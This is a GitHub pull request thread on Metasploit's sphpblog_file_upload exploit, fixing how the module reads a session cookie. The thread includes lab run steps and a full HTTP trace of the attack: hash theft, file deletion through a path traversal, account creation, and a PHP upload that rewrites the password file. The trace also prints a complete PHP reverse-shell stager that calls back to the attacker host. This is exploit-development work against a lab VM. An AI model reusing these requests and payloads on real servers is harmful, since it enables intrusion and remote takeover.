
Corrected headers check for retrieved cookie #14442

Merged
merged 2 commits into from
Dec 3, 2020

Conversation

justinopatrny
Contributor

Previous get_cookies method not working properly.

This pull corrects a non-functioning cookie verification in the sphpblog_file_upload exploit.

Bug: (#14441)

Verification

List the steps needed to make sure this thing works

Start Kali with updated Metasploit, add NIC assigned to 10.10.10.250/24
Start pWnOS v2.0 (already hardcoded as 10.10.10.100)

  • Start msfconsole
  • use exploit/unix/webapp/sphpblog_file_upload
  • set rhosts 10.10.10.100
  • set uri /blog
  • set lhost 10.10.10.250
  • exploit

This should trigger a successful exploit:

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[*] Successfully retrieved hash: $1$gJEbDRbd$5mYGKYmViq/IcU/M9Mdza1
[*] Successfully removed /config/password.txt
[*] Successfully created temporary account.
[*] Successfully logged in as QErwYO:2MsbV2
[*] Successfully retrieved cookie: 5ciq80flifo4kdt2lfmniqokj7
[*] Successfully uploaded bHMPBcr8mUgjeQnD0G2m.php
[*] Successfully uploaded zAQfEXaTovTJORZDxKvh.php
[*] Successfully reset original password hash.
[*] Successfully removed /images/bHMPBcr8mUgjeQnD0G2m.php
[*] Calling payload: /images/zAQfEXaTovTJORZDxKvh.php
[*] Sending stage (39282 bytes) to 10.10.10.100
[*] Meterpreter session 1 opened (10.10.10.250:4444 -> 10.10.10.100:57843) at 2020-11-28 12:02:05 -0600
[*] Successfully removed /images/zAQfEXaTovTJORZDxKvh.php

Previous get_cookies method not working properly
@bcoles
Contributor

bcoles commented Nov 30, 2020

The tests failed due to accessing res.headers['Set-Cookie'] directly:

[*] Running msftidy.rb in ./.git/hooks/post-merge mode

--- Checking new and changed module syntax with tools/dev/msftidy.rb ---

modules/exploits/unix/webapp/sphpblog_file_upload.rb:116 - [WARNING] Do not read Set-Cookie header directly, use res.get_cookies instead: if (res.headers['Set-Cookie'] =~ /my_id=(.*)/)

res.get_cookies is the preferred approach. It is strange that this is not working.

If there's a bug in res.get_cookies then there's a more pressing issue here. Hard to say without seeing the HTTP headers.

Can you run again with set HttpTrace true and paste the output?

@justinopatrny
Contributor Author

Here is the output:

[*] Started reverse TCP handler on 10.10.10.250:4444 
####################
# Request:
####################
GET /blog/config/password.txt HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Last-Modified: Mon, 05 Oct 2020 09:28:03 GMT                                          
ETag: "3fe8f-22-5b0e91960ac24"                                                        
Accept-Ranges: bytes                                                                  
Content-Length: 34                                                                    
Vary: Accept-Encoding                                                                 
Content-Type: text/plain                                                              
X-Pad: avoid browser bug                                                              
                                                                                      
$1$W9NTrm2S$RYFqwt0tVFOOrvaS5/8ek.                                                    
[+] Successfully retrieved hash: $1$W9NTrm2S$RYFqwt0tVFOOrvaS5/8ek.
####################
# Request:
####################
GET /blog/comment_delete_cgi.php?y=05&m=08&comment=./config/password.txt HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 302 Found
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Location: http://10.10.10.100/blog/comments.php?y=05&m=08&entry=                      
Vary: Accept-Encoding                                                                 
Content-Length: 0                                                                     
Content-Type: text/html                                                               
X-Pad: avoid browser bug                                                              
                                                                                      
                                                                                      
[+] Successfully removed /config/password.txt
####################
# Request:
####################
POST /blog/install03_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: application/x-www-form-urlencoded                                       
Content-Length: 23                                                                    
                                                                                      
user=1phEpO&pass=8Wbh1w                                                               
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Set-Cookie: PHPSESSID=7869n2gpoto3nbd2pa3pgb18q3; path=/, my_id=7869n2gpoto3nbd2pa3pgb18q3                                                                                  
Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0         
Pragma: no-cache                                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 5780                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Create Username &amp; Password</title>                      
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="700" colspan="2" bgcolor="#999966">
                                                <div id="header">                     
                                                        No Title                     </div>                                                                                 
                                                <div id="pagebody">                   
                                                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="left">                                         
                                                                <tr valign="top">     
                                                                        <td width="450" bgcolor="#FFFFFF">                                                                  
                                                                                <div id="maincontent">                                                                      
                                                                                     <h2>Congratulations!</h2>You are now logged in. Click below to visit the Setup page, where you can name your blog. Happy blogging!<p /><a href="setup.php?blog_language=english">[ Setup ]</a><br /><br />                                                        </div>                                                                                 
                                                                        </td>         
                                                                        <td width="250" bgcolor="#F2F2F2" style="border-left: 1px solid #D9D9D9;">                          
                                                                                <div id="sidebar">                                                                          
                                                                                     Links<br /><a href="index.php">Home</a><br /><a href="contact.php">Contact Me</a><br /><a href="stats.php">Stats</a><br /><a href="add_link.php">[ + link ]</a><br /><hr noshade size="1" color=#D9D9D9><a href="set_login.php">Change Login</a><br /><a href="logout.php">Logout</a><hr noshade size="1" color=#D9D9D9>Archives<br />                   
                <table border="0" cellpadding="0" cellspacing="5" align="center">     
                <tr>                                                                  
                <td align="center"><a href="/blog/install03_cgi.php?y=20&m=09">&laquo;</a></td>                                                                             
                <td align="center" colspan="5"><b>October 2020</b></td>               
                <td align="center"><a href="/blog/install03_cgi.php?y=20&m=11">&raquo;</a></td>                                                                             
                </tr>                                                                 
                <tr><td>Sun</td><td>Mon</td><td>Tue</td><td>Wed</td><td>Thu</td><td>Fri</td><td>Sat</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td align="center">1</td><td align="center">2</td><td align="center">3</td></tr><tr><td align="center">4</td><td align="center">5</td><td align="center">6</td><td align="center">7</td><td align="center">8</td><td align="center">9</td><td align="center">10</td></tr><tr><td align="center">11</td><td align="center">12</td><td align="center">13</td><td align="center">14</td><td align="center">15</td><td align="center">16</td><td align="center">17</td></tr><tr><td align="center">18</td><td align="center">19</td><td align="center">20</td><td align="center">21</td><td align="center">22</td><td align="center">23</td><td align="center">24</td></tr><tr><td align="center">25</td><td align="center">26</td><td align="center">27</td><td align="center">28</td><td align="center">29</td><td align="center">30</td><td align="center">31</td></tr><tr><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr></table><hr noshade size="1" color=#D9D9D9>Search:<br /><form method=get action="search.php"><input type="text" size="16" name="q">&nbsp;<input type="submit" value="Go"></form><hr noshade size="1" color=#D9D9D9>Menu<br /><a href="add.php">Add Entry</a><br /><a href="add_static.php">Add Static Page</a><br /><a href="upload_img.php">Upload Image</a><hr noshade size="1" color=#D9D9D9>Preferences<br /><a href="categories.php">Categories</a><br /><a href="add_block.php">Blocks</a><br /><a href="setup.php">Preferences</a><br /><a href="themes.php">Themes</a><br /><a href="colors.php">Colors</a><br /><a href="options.php">Date &amp; Time</a><br /><a href="info.php">Meta Tags</a><br /><hr noshade size="1" color=#D9D9D9>Most Recent Entries<br /><a href="http://10.10.10.100/blog/index.php?entry=entry110509-191340">New Blog!</a><br /><hr noshade size="1" color=#D9D9D9><div align="center"><a 
href="http://sourceforge.net/projects/sphpblog/"><img style="margin-bottom: 5px;" src="interface/button_sphpblog.png" alt="Powered by Simple PHP Blog 0.4.0" title="Powered by Simple PHP Blog 0.4.0" border="0"></a><br /><a href="rss.php"><img style="margin-bottom: 5px;" src="interface/button_rss20.png" alt="Get RSS 2.0 Feed" title="Get RSS 2.0 Feed" border="0"></a><br /><a href="atom.php"><img style="margin-bottom: 5px;" src="interface/button_atom03.png" alt="Get Atom 0.3 Feed" title="Get Atom 0.3 Feed" border="0"></a><br /><a href="rdf.php"><img style="margin-bottom: 5px;" src="interface/button_rdf10.png" alt="Get RDF 1.0 Feed" title="Get RDF 1.0 Feed" border="0"></a><br /><a href="http://php.net/"><img style="margin-bottom: 5px;" src="interface/button_php.png" alt="Powered by PHP 5.3.5-1ubuntu7" title="Powered by PHP 5.3.5-1ubuntu7" border="0"></a><br /><img style="margin-bottom: 5px;" src="interface/button_txt.png" alt="Powered by Plain text files" title="Powered by Plain text files" border="0"><br /></div>         </div>                                                                                 
                                                                        </td>         
                                                                </tr>                 
                                                                <tr align="left" valign="top">                                                                              
                                                                        <td width="700" colspan="2">                                                                        
                                                                                <div id="footer">No Footer - Page Generated in 0.0204 seconds</div>                         
                                                                        </td>         
                                                                </tr>                 
                                                        </table>                      
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully created temporary account.
####################
# Request:
####################
POST /blog/login_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: application/x-www-form-urlencoded                                       
Content-Length: 23                                                                    
                                                                                      
user=1phEpO&pass=8Wbh1w                                                               
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Set-Cookie: PHPSESSID=t2tga51b05no8drb0ku3pjri84; path=/, my_id=t2tga51b05no8drb0ku3pjri84                                                                                  
Expires: Thu, 19 Nov 1981 08:52:00 GMT                                                
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0         
Pragma: no-cache                                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 5649                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Login</title>                                               
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="700" colspan="2" bgcolor="#999966">
                                                <div id="header">                     
                                                        No Title                     </div>                                                                                 
                                                <div id="pagebody">                   
                                                        <table border="0" width="700" cellspacing="0" cellpadding="0" align="left">                                         
                                                                <tr valign="top">     
                                                                        <td width="450" bgcolor="#FFFFFF">                                                                  
                                                                                <div id="maincontent">                                                                      
                                                                                     <h2>Success!</h2>You are now logged in. Happy blogging!<p /><a href="index.php">Return to Home</a><br />                                                                    </div>                                                                                 
                                                                        </td>         
                                                                        <td width="250" bgcolor="#F2F2F2" style="border-left: 1px solid #D9D9D9;">                          
                                                                                <div id="sidebar">                                                                          
                                                                                     Links<br /><a href="index.php">Home</a><br /><a href="contact.php">Contact Me</a><br /><a href="stats.php">Stats</a><br /><a href="add_link.php">[ + link ]</a><br /><hr noshade size="1" color=#D9D9D9><a href="set_login.php">Change Login</a><br /><a href="logout.php">Logout</a><hr noshade size="1" color=#D9D9D9>Archives<br />                   
                <table border="0" cellpadding="0" cellspacing="5" align="center">     
                <tr>                                                                  
                <td align="center"><a href="/blog/login_cgi.php?y=20&m=09">&laquo;</a></td>                                                                                 
                <td align="center" colspan="5"><b>October 2020</b></td>               
                <td align="center"><a href="/blog/login_cgi.php?y=20&m=11">&raquo;</a></td>                                                                                 
                </tr>                                                                 
                <tr><td>Sun</td><td>Mon</td><td>Tue</td><td>Wed</td><td>Thu</td><td>Fri</td><td>Sat</td></tr><tr><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td>&nbsp;</td><td align="center">1</td><td align="center">2</td><td align="center">3</td></tr><tr><td align="center">4</td><td align="center">5</td><td align="center">6</td><td align="center">7</td><td align="center">8</td><td align="center">9</td><td align="center">10</td></tr><tr><td align="center">11</td><td align="center">12</td><td align="center">13</td><td align="center">14</td><td align="center">15</td><td align="center">16</td><td align="center">17</td></tr><tr><td align="center">18</td><td align="center">19</td><td align="center">20</td><td align="center">21</td><td align="center">22</td><td align="center">23</td><td align="center">24</td></tr><tr><td align="center">25</td><td align="center">26</td><td align="center">27</td><td align="center">28</td><td align="center">29</td><td align="center">30</td><td align="center">31</td></tr><tr><td></td><td></td><td></td><td></td><td></td><td></td><td></td></tr></table><hr noshade size="1" color=#D9D9D9>Search:<br /><form method=get action="search.php"><input type="text" size="16" name="q">&nbsp;<input type="submit" value="Go"></form><hr noshade size="1" color=#D9D9D9>Menu<br /><a href="add.php">Add Entry</a><br /><a href="add_static.php">Add Static Page</a><br /><a href="upload_img.php">Upload Image</a><hr noshade size="1" color=#D9D9D9>Preferences<br /><a href="categories.php">Categories</a><br /><a href="add_block.php">Blocks</a><br /><a href="setup.php">Preferences</a><br /><a href="themes.php">Themes</a><br /><a href="colors.php">Colors</a><br /><a href="options.php">Date &amp; Time</a><br /><a href="info.php">Meta Tags</a><br /><hr noshade size="1" color=#D9D9D9>Most Recent Entries<br /><a href="http://10.10.10.100/blog/index.php?entry=entry110509-191340">New Blog!</a><br /><hr noshade size="1" color=#D9D9D9><div align="center"><a 
href="http://sourceforge.net/projects/sphpblog/"><img style="margin-bottom: 5px;" src="interface/button_sphpblog.png" alt="Powered by Simple PHP Blog 0.4.0" title="Powered by Simple PHP Blog 0.4.0" border="0"></a><br /><a href="rss.php"><img style="margin-bottom: 5px;" src="interface/button_rss20.png" alt="Get RSS 2.0 Feed" title="Get RSS 2.0 Feed" border="0"></a><br /><a href="atom.php"><img style="margin-bottom: 5px;" src="interface/button_atom03.png" alt="Get Atom 0.3 Feed" title="Get Atom 0.3 Feed" border="0"></a><br /><a href="rdf.php"><img style="margin-bottom: 5px;" src="interface/button_rdf10.png" alt="Get RDF 1.0 Feed" title="Get RDF 1.0 Feed" border="0"></a><br /><a href="http://php.net/"><img style="margin-bottom: 5px;" src="interface/button_php.png" alt="Powered by PHP 5.3.5-1ubuntu7" title="Powered by PHP 5.3.5-1ubuntu7" border="0"></a><br /><img style="margin-bottom: 5px;" src="interface/button_txt.png" alt="Powered by Plain text files" title="Powered by Plain text files" border="0"><br /></div>         </div>                                                                                 
                                                                        </td>         
                                                                </tr>                 
                                                                <tr align="left" valign="top">                                                                              
                                                                        <td width="700" colspan="2">                                                                        
                                                                                <div id="footer">No Footer - Page Generated in 0.0088 seconds</div>                         
                                                                        </td>         
                                                                </tr>                 
                                                        </table>                      
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully logged in as 1phEpO:8Wbh1w
[-] Error retrieving cookie!
####################
# Request:
####################
POST /blog/upload_img_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: multipart/form-data; boundary=foC9JD                                    
Content-Length: 265                                                                   
Cookie: my_id=[-] Error retrieving cookie!                                            
; PHPSESSID=[-] Error retrieving cookie!


--foC9JD
Content-Disposition: form-data; name="userfile"; filename="BHyPjh2RrdgNoeYjsM4K.php"
Content-Type: text/plain


    <?php $hash = $_POST['hash'];
    $fp = fopen("../config/password.txt","w");
    fwrite($fp,$hash);
    fpclose($fp);
    ?>
--foC9JD--
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 430                                                                   
Connection: close                                                                     
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>400 Bad Request</title>                                                        
</head><body>                                                                         
<h1>Bad Request</h1>                                                                  
<p>Your browser sent a request that this server could not understand.<br />           
Request header field is missing ':' separator.<br />                                  
<pre>                                                                                 
; PHPSESSID=[-] Error retrieving cookie!</pre>                                        
</p>
<hr>
<address>Apache/2.2.17 (Ubuntu) Server at web.corp.ISIntS.com Port 80</address>
</body></html>

[+] Successfully Uploaded BHyPjh2RrdgNoeYjsM4K.php
####################
# Request:
####################
POST /blog/upload_img_cgi.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: multipart/form-data; boundary=06WpVM                                    
Content-Length: 1257                                                                  
Cookie: my_id=[-] Error retrieving cookie!                                            
; PHPSESSID=[-] Error retrieving cookie!


--06WpVM
Content-Disposition: form-data; name="userfile"; filename="pzlA2Y0MqB2Do2huxCNC.php"
Content-Type: text/plain

<?php /*<?php /**/ error_reporting(0); $ip = '10.10.10.250'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();?>
--06WpVM--
####################
# Response:
####################
HTTP/1.1 400 Bad Request
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 430                                                                   
Connection: close                                                                     
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>400 Bad Request</title>                                                        
</head><body>                                                                         
<h1>Bad Request</h1>                                                                  
<p>Your browser sent a request that this server could not understand.<br />           
Request header field is missing ':' separator.<br />                                  
<pre>                                                                                 
; PHPSESSID=[-] Error retrieving cookie!</pre>                                        
</p>
<hr>
<address>Apache/2.2.17 (Ubuntu) Server at web.corp.ISIntS.com Port 80</address>
</body></html>

[+] Successfully Uploaded pzlA2Y0MqB2Do2huxCNC.php
####################
# Request:
####################
POST /blog/images/BHyPjh2RrdgNoeYjsM4K.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
Content-Type: application/x-www-form-urlencoded                                       
Content-Length: 39                                                                    
                                                                                      
hash=$1$W9NTrm2S$RYFqwt0tVFOOrvaS5/8ek.                                               
####################
# Response:
####################
HTTP/1.1 404 Not Found
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 312                                                                   
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>404 Not Found</title>                                                          
</head><body>                                                                         
<h1>Not Found</h1>                                                                    
<p>The requested URL /blog/images/BHyPjh2RrdgNoeYjsM4K.php was not found on this server.</p>                                                                                
<hr>                                                                                  
<address>Apache/2.2.17 (Ubuntu) Server at 10.10.10.100 Port 80</address>              
</body></html>                                                                        
                                                                                      
[+] Successfully reset original password hash.
####################
# Request:
####################
GET /blog/comment_delete_cgi.php?y=05&m=08&comment=./images/BHyPjh2RrdgNoeYjsM4K.php HTTP/1.1                                                                               
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:56 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 1752                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Comments</title>                                            
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="450" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#999966">            
                                                <div id="header">                     
                                                        No Title<br />                
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#FFFFFF">            
                                                <div id="maincontent">                
                                                        <h2>Whoops!</h2>Comment not deleted. I ran into a problem while deleting your comment.<br /><br />Server Reported:<br /><p /><a href="index.php">Return to Home</a><br /><br />                          </div>                                                                                 
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450">                              
                                                <div id="footer">No Footer - Page Generated in 0.006 seconds</div>                                                          
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully removed /images/BHyPjh2RrdgNoeYjsM4K.php
[*] Calling payload: /images/pzlA2Y0MqB2Do2huxCNC.php
####################
# Request:
####################
GET /blog/images/pzlA2Y0MqB2Do2huxCNC.php HTTP/1.1
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 404 Not Found
Date: Mon, 05 Oct 2020 11:37:57 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
Vary: Accept-Encoding                                                                 
Content-Length: 312                                                                   
Content-Type: text/html; charset=iso-8859-1                                           
                                                                                      
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">                                    
<html><head>                                                                          
<title>404 Not Found</title>                                                          
</head><body>                                                                         
<h1>Not Found</h1>                                                                    
<p>The requested URL /blog/images/pzlA2Y0MqB2Do2huxCNC.php was not found on this server.</p>                                                                                
<hr>                                                                                  
<address>Apache/2.2.17 (Ubuntu) Server at 10.10.10.100 Port 80</address>              
</body></html>                                                                        
                                                                                      
####################
# Request:
####################
GET /blog/comment_delete_cgi.php?y=05&m=08&comment=./images/pzlA2Y0MqB2Do2huxCNC.php HTTP/1.1                                                                               
Host: 10.10.10.100                                                                    
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)                        
                                                                                      
                                                                                      
####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 05 Oct 2020 11:37:58 GMT                                                   
Server: Apache/2.2.17 (Ubuntu)                                                        
X-Powered-By: PHP/5.3.5-1ubuntu7                                                      
Vary: Accept-Encoding                                                                 
Content-Length: 1753                                                                  
Content-Type: text/html                                                               
                                                                                      
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"                        
        "http://www.w3.org/TR/html4/loose.dtd">                                       
<html>                                                                                
<head>                                                                                
        <meta http-equiv='Content-Type' content='text/html; charset=ISO-8859-1'>      
        <link rel=stylesheet type="text/css" href="themes/default/style.css">         
        <style type="text/css">body { background-color: #CCCC99; color: #666633; }#header { border-color: #4D4D45; color: #FFFFFF; background-color: #999966; }#footer { color: #666666; background: #EEEEEE; border-top: 1px solid #4D4D45; }h1, h2, h3, h4, h5, h6 { color: #666633; }#blog_subject { color: #666633; }#blog_date { color: #999999; }a:link, a:visited { color: #993333; }a:hover { color: #FF3333; }a:active { color: #3333FF; }</style>   <script language="JavaScript" src="scripts/sb_javascript.js"></script>
        <title>No Title - Comments</title>                                            
</head>                                                                               
                <body leftmargin="0" topmargin="0" marginheight="0" marginwidth="0">  
                        <br />                                                        
                        <table border="0" width="450" cellspacing="0" cellpadding="0" align="center" style="border: 1px solid #4D4D45; border-top: 8px solid #4D4D45;">     
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#999966">            
                                                <div id="header">                     
                                                        No Title<br />                
                                                </div>                                
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450" bgcolor="#FFFFFF">            
                                                <div id="maincontent">                
                                                        <h2>Whoops!</h2>Comment not deleted. I ran into a problem while deleting your comment.<br /><br />Server Reported:<br /><p /><a href="index.php">Return to Home</a><br /><br />                          </div>                                                                                 
                                        </td>                                         
                                </tr>                                                 
                                <tr align="left" valign="top">                        
                                        <td width="450">                              
                                                <div id="footer">No Footer - Page Generated in 0.0145 seconds</div>                                                         
                                        </td>                                         
                                </tr>                                                 
                        </table>                                                      
                        <br />                                                        
                </body>                                                               
                </html>                                                               
                                                                                      
[+] Successfully removed /images/pzlA2Y0MqB2Do2huxCNC.php
[*] Exploit completed, but no session was created.

@bcoles

bcoles commented Nov 30, 2020

Set-Cookie: PHPSESSID=7869n2gpoto3nbd2pa3pgb18q3; path=/, my_id=7869n2gpoto3nbd2pa3pgb18q3  

lol

What does res.get_cookies think the cookies are?

Can you throw puts res.get_cookies.inspect in before the cookie check and paste the output?

It looks like the cookie value is used for both the my_id and PHPSESSID cookie throughout the module.

my_id=#{session}; PHPSESSID=#{session}

If the output of res.get_cookies is reasonable, then there's probably a cleaner and easier way to keep both the tests and the module happy.

Also this module is kind of a mess and is inline with current design and style standards. It could do with some cleanup.

@justinopatrny

Here you go:

msf6 exploit(unix/webapp/sphpblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.10.250:4444 
[+] Successfully retrieved hash: $1$qmJBhAiQ$svVcAJqX0gNhlX.iCpY4o0
[+] Successfully removed /config/password.txt
[+] Successfully created temporary account.
[+] Successfully logged in as CCBBiy:GXGLyD
"PHPSESSID=kgks1uicqn4n74kba3an676fd3;"
[-] Error retrieving cookie!
[+] Successfully Uploaded zGZZdjHW6BgsWClwBHnu.php
[+] Successfully Uploaded gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully reset original password hash.
[+] Successfully removed /images/zGZZdjHW6BgsWClwBHnu.php
[*] Calling payload: /images/gaj9hSsTlUrN0fDrxpiq.php
[+] Successfully removed /images/gaj9hSsTlUrN0fDrxpiq.php
[*] Exploit completed, but no session was created.

@bcoles

